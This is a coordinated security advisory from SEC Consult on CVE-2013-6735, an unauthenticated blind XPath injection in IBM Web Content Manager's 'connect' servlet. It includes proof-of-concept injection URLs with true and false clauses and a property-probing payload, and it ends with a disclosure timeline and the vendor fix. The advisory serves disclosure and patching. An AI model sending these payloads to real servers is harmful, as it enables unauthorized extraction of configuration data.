title: XPath Injection product: IBM Web Content Manager (WCM)
vulnerable version: 6.x, 7.x, 8.x fixed version: - impact: high homepage: http://www.ibm.com/ found: 2013-10-27 CVE: CVE-2013-6735 by: A.Antukh, S.Temnikov SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
"IBM® Web Content Manager is designed to accelerate web content development and deployment through Internet, intranet and extranet sites. This software enables users to create and publish content while IT retains control. Through advanced personalization, IBM Web Content Manager delivers the right information to the right audience when needed, providing an exceptional customer experience"
The discovered vulnerability can be exploited without authentication and therefore pose a high security risk - it allows extraction of configuration data from the server. The impact of the XPath vulnerability isn't researched fully. SEC Consult suspects that it is possible to extract sensitive information that will be useful for further attacks. The recommendation of SEC Consult is to immediately install patches provided by the vendor.
A typical URL for a host with installed WCM looks like this: http://[HOST]:[PORT]/wps/wcm/connect/[PATH]
The "connect" servlet provided in the standard installation of IBM Web Content Manager parses the PATH element as follows: [PATH] = [LIBRARY]/[SITE_AREA_PATH]/[CONTENT]
Due to insufficient validation, the "LIBRARY" element suffers from an XPath-injection vulnerability.
An unauthenticated user is able to perform blind XPath Injection attacks e.g. get current application configuration, enumerate nodes and extract other valuable information from vulnerable installations of Web Content Manager.
The vulnerability is exploited due to improper validation of the LIBRARY parameter, which is parsed by the "connect" servlet.
The most basic cases are presented below, and allow an attacker to manipulate logic of the request. The "false" clause causes an error, the "true" clause (if not defined explicitly) redirects an attacker to the "/wcm/webinterface/login/login.jsp" page.
True clause: http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='a False clause: http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='b
Knowing the difference between responses of the true and false clauses, it is possible to manipulate requests in order to extract the information. For example, if the following request returns TRUE, this would give an attacker information about the "name" property.
http://[HOST]:[PORT]/wps/wcm/connect/' or (@ibmcontentwcm:name = "pznDT") or 'a'='b
In a similar way, with use of the "jcr:like" and "jcr:contains" functions one can effectively restore the value for the "target" property.
The vulnerability is verified to exist in the 7.0 and 8.0 versions of WCM which are the most recent versions at the moment of writing the advisory.
2013-12-04: Contacted vendor through email@example.com. 2013-12-04: Initial vendor response. 2013-12-06: Issues will be verified. 2013-12-20: Security bulletin released. 2013-12-27: SEC Consult releases coordinated security advisory.
Apply the Interim Fix PI07777 www.ibm.com/eserver/support/fixes/fixcentral/swg/quickorder?productid=WebSphere%20Portal&brandid=5&apar=PI07777
No workaround available.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab
SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF A. Antukh / @2013